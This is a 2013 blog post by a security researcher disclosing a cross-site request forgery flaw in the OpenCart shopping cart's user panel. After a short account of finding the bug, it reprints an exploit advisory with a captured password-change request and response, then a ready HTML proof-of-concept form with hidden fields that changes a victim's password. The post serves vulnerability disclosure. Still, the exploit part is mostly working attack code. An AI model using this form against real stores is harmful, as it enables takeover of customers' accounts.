OpenCart Latest Version CSRF

Posted by Saadi On Thursday 4 April 2013 23 comments
Hi ,  from last some days i was pentesting Opencart A Shopping Cart System .

 www.opencart.com

And found OpenCart Latest Version is vulnerable to CSRF inside user panel .
You can edit user password and all stuff.

So i write the final description about the vulnerability and send it to exploit database sources.
The next day i got reply from PacketStromeSecurity Team  that OpenCart CSRF is already reported previously to us and they send me the link.
What i found it was discovered in old versions and reported in 2010 . .
AHhhh . .  now this is quite embarrassing that the latest version is still vuln :(

I again setup the latest version and found it is still vuln . . .
i don't know why this vulnerability has not been patch by OpenCart Development team as already reported by different security researchers . .

Oka so here is Exploit
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/


# Exploit Title : OpenCart CSRF
# Date     : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web   : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site request forgery

OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.

OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.

Header

----------------------------------------------------------
http://localhost/index.php?route=account/password

POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"

123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"

123456789
-----------------------------2465524120551--

Response

HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------

Simple Poc to change user Password

<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">

    <div class="content">
      <table class="form">
        <tbody><tr>
     
          <td><input name="password" value="987654321" type="hidden">
            </td>
        </tr>
        <tr>
       
          <td><input name="confirm" value="987654321" type="hidden">
            </td>
        </tr>
      </tbody></table>
    </div>
    <div class="buttons">
 
      <div class="right"><input value="Continue" class="button" type="submit"></div>
    </div>
  </form>

edit

OpenCart <= 1.5.6.1 SQL Injection

#Independent Pakistani Security Researcher


READ MORE